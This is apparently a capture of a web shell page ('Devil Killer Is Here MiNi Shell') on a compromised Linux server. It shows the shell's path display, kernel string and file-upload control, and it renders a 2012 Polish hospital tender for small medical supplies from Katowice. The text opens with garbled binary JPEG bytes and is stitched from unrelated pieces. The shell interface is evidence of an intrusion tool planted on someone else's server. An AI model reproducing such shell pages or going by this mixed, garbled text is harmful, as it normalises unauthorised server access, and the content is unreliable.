JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120712/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120712/152285-N-2012.html

<p class="kh_header"><b>Katowice: Dostawy drobnego sprzętu medycznego niejałowego</b><br>
<b>Numer ogłoszenia: 152285 - 2012; data zamieszczenia: 12.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny nr 6 Śląskiego Uniwersytetu Medycznego w Katowicach Górnośląskie Centrum Zdrowia Dziecka im. Jana Pawła II , ul. Medyków 16, 40-752 Katowice, woj. śląskie, tel. (032) 207 15 32, faks (032) 2071546, 252 6303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gczd.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy drobnego sprzętu medycznego niejałowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy drobnego sprzętu medycznego niejałowego. Zamawiający przedmiot zamówienia podzielił na 22 Pakiety:
Pakiet nr 1	-Test do pomiaru krzepnięcia krwi,
Pakiet nr 2	-Elektrody do badań słuchu metoda Bera,
Pakiet nr 3	-Przestrzeń martwa,
Pakiet nr 4	-Systemy oddechowe jednorazowe do respiratorów Babylog i Sechrist,
Pakiet nr 5	-Materace i pokrowce zmywalne do łóżek szpitalnych,
Pakiet nr 6	-Mikrometoda OB,
Pakiet nr 7	-Maski silikonowe do resuscytatora,
Pakiet nr 8	-Fartuchy ochronne, Maski ochronne, Rękawice ochronne,
Pakiet nr 9	-Drobny sprzęt medyczny różny (1),
Pakiet nr 10	-Akcesoria do stomii,
Pakiet nr 11	-Prowadnice do trudnej intubacji,
Pakiet nr 12	 -Resuscytatory wielorazowe typu AMBU     noworodkowe, niemowlęce, pediatryczne i dla dorosłych,
Pakiet nr 13	-Okularki do fototerapii dla noworodków i wcześniaków,
Pakiet nr 14	-Komora wilgotna do osłony oka,
Pakiet nr 15	-Stojaki do kroplówek,
Pakiet nr 16	-Rekawice z nitrylu,
Pakiet nr 17	-Patyczki higieniczne do czyszczenia uszu,
Pakiet nr 18	-Wzierniki do otoskopu,
Pakiet nr 19	-Dozownik tlenu z nawilżaczem,
Pakiet nr 20	-Łyżki i rękojeść do laryngoskopów,
Pakiet nr 21	-Zestawy NCPAP,
Pakiet nr22	-Kołnierze ortopedyczne,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 22.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: - posiadania uprawnień do wykonywania działalności będącej przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: - posiadania wiedzy i doświadczenia w zakresie objętym przedmiotem zamówienia. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: - dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia. Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: - dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: -sytuacji ekonomicznej i finansowej. Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów Zamawiający wymaga przedłożenia informacji, banku lub spółdzielczej kasy oszczędnościowo-kredytowej, posiadanych środków finansowych lub zdolności kredytowej tych podmiotów nie mniejszej niż 50 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie, że oferowany przedmiot zamówienia  (podać numer pakietu) posiada wszystkie wymagane dokumenty przepisami ustawy z 20 maja 2010 r. o wyrobach medycznych /Dz. U      z 2010 r Nr 107 poz. 679/ dopuszczające oferowany sprzęt medyczny do obrotu i używania              w zakładach opieki zdrowotnej zgodnie z ustawą i, że dokumenty będą udostępniane na każde wezwanie Zamawiającego.
2. Próbki, katalogi. 
3. Wykaz próbek.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia: 1). W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2). Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w pkt. 1). 3). W przypadku wspólnego ubiegania się o udzielenie zamówienia: a) wymóg posiadania uprawnień określonych w art. 22 ust 1 powinien spełniać ten Wykonawca, który będzie wykonywać część zamówienia objętego obowiązkiem posiadania uprawnień b) każdy z wykonawców ubiegających się wspólnie o zamówienie musi oddzielnie udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust 1 ustawy Pzp (składając dokumenty i oświadczenia określone przez Zamawiającego w części III.4.2)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo Zamówień publicznych, Zamawiający dopuszcza zmianę zawartej umowy w trakcie jej trwania, w następujących przypadkach:
a) obniżenia ceny jednostkowej przez Wykonawcę, 
b) zmiany urzędowej stawki podatku VAT, 
c) zmiany konfekcjonowania przy założeniu, że cena proponowanego opakowania w przeliczeniu na ilości z oferty nie będzie wyższa niż dotychczasowa, 
d) zmiany numeru katalogowego producenta, 
e) zmiany terminu obowiązywania umowy w przypadku nie wykorzystania przez Zamawiającego w trakcie trwania umowy pełnej ilości dostarczanego przedmiotu umowy - przy zachowaniu dotychczasowej ceny, 
f ) zmiany producenta przedmiotu umowy, w przypadku gdy producent wskazany w ofercie przez Wykonawcę wycofał dany towar z produkcji - przy cenie nie większej niż w umowie lub jeżeli Wykonawca nie może zaoferować w takim przypadku towar innego producenta w cenie nie wyższej niż w umowie, rozwiązanie jej w zakresie dotyczącym tego towaru za porozumieniem stron, bez konieczności ponoszenia kary przez żadną ze stron umowy,
g) przedłużenie terminu płatności, 
h) zmiany stawek opłat celnych wprowadzonych decyzjami odpowiednich władz państwowych, 
w zakresie danych identyfikacyjnych Strony umowy, takich jak np. firma, adres, osoby upoważnione do kontaktów/odbioru lub inne zapisy dotyczące wskazania Stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gczd.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego pok. 18. Warunki płatności: przelew, gotówka lub za zaliczeniem pocztowym. Cena Specyfikacji Istotnych Warunków Zamówienia w wersji papierowej 10 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2012 godzina 11:30, miejsce: Siedziba Zamawiającego - Kancelaria pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Test do pomiaru krzepnięcia krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Test do pomiaru krzepnięcia krwi ACT Hemochron, probówki wykonane ze szkła, dostępne testy APPT i PT.	op.(1op.=95 testów)	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Elektrody do badań słuchu metodą Bera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektrody jednorazowego użytku żelowane stosowane do badań słuchu metodą Bera	szt. 	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przestrzeń martwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przestrzeń martwa dla dorosłych; łącznik- kompakt z portem do odsysania 22F/15F dł. 150 złożona	szt	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Systemy oddechowe jednorazowe 		
do respiratorów Babylog i Sechrist.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednorazowe systemy oddechowe do respiratorów Babylog i Sechrist - noworodkowe. Układ z pojedynczą spiralą grzejną mającą możliwość podłączenia do nawilżacza F&P , ramię wdechowe, które daje możliwość podłączenia czujnika temperatury do nawilżacza F&P+ ramię wydechowe z pułapką wodną + łącznik typu Y z możliwością podpięcia czujnika temperatury- średnica rur 10 mm na całej długości i  łącznik typu Y z drenem do pomiaru ciśnienia i możliwością podłączenia  czujnika temperatury- średnica rur 10 mm, ramię wdechowe i ramię wydechowe nie krótsze niż 1,5 m oraz komora nawilżacza samonapełniająca, jednorazowa, kompatybilna z układem / całość mikrobiologicznie czysta/. 	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Materace i pokrowce zmywalne do łóżek szpitalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Materac z pokrowcem nieprzemakalnym z możliwością dezynfekcji parowej w temp. do 105°C wym. 194x86x10 cm, zamykany na suwak	szt.	3	,
2.	Materac z pokrowcem nieprzemakalnym z możliwością dezynfekcji parowej w temp. do 105°C wym. 200x90x12 cm, zamykany na suwak	szt.	3	,
3.	Materac z pokrowcem nieprzemakalnym z możliwością dezynfekcji parowej w temp. do 105°C wym. 130x68x10 cm, zamykany na suwak (łóżko Junior)	szt.	6	,
4.	Materac z pokrowcem nieprzemakalnym z możliwością dezynfekcji parowej w temp. do 105°C wym. 168x80x12 cm, zamykany na suwak	szt.	1	,
5.	Pokrowiec na materac o wym. 200x90x12cm nieprzemakalny      z możliwością dezynfekcji parowej w temp. do 105°C, zamykany na suwak	szt.	3	,
6.	Pokrowiec na materac o wym. 62x62x4,5 cm nieprzemakalny       z możliwością dezynfekcji parowej w temp. do 105°C, zamykany na suwak	szt.	6	,
7.	Pokrowiec na materac o wym. 194x86x10cm nieprzemakalny      z możliwością dezynfekcji parowej w temp. do 105°C, zamykany na suwak	szt.	3	,
8.	Pokrowiec na materac o wym. 120x60x6 cm nieprzemakalny         z możliwością dezynfekcji parowej w temp. do 105°C, zamykany na suwak	szt.	1	,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mikrometoda OB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mikrometoda OB	szt. 	1440.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Maski silikonowe do resuscytatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Maski silikonowe w całości, okrągłe niemowlęce, wielorazowe do sterylizacji, rozmiar 00,0	szt.	20	,
2.	Maski silikonowe w całości, okrągłe noworodkowe, wielorazowe do sterylizacji, rozmiar 1	szt.	40	,
3.	Maski silikonowe w całości, wielorazowe do sterylizacji, rozmiar 2	szt.	15	,
4.	Maski silikonowe w całości, nie składane, do sterylizacji rozmiar 3	szt.	20	,
5.	Maski silikonowe w całości, nie składane )wyprofilowane do kształtu twarzy, trójkątne) do sterylizacji, rozmiar 4	szt.	10	,
6.	Maski silikonowe w całości, nie składane )wyprofilowane do kształtu twarzy, trójkątne) do sterylizacji, rozmiar 5	szt.	10	,
7.	Zastawka do rezerwuaru tlenu (membrana) prosta	szt.	5	,
8.	Zastawka do pacjenta (do worka resuscytatora)	szt.	5	,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Fartuchy ochronne, Maski ochronne, Rękawice ochronne.</p>
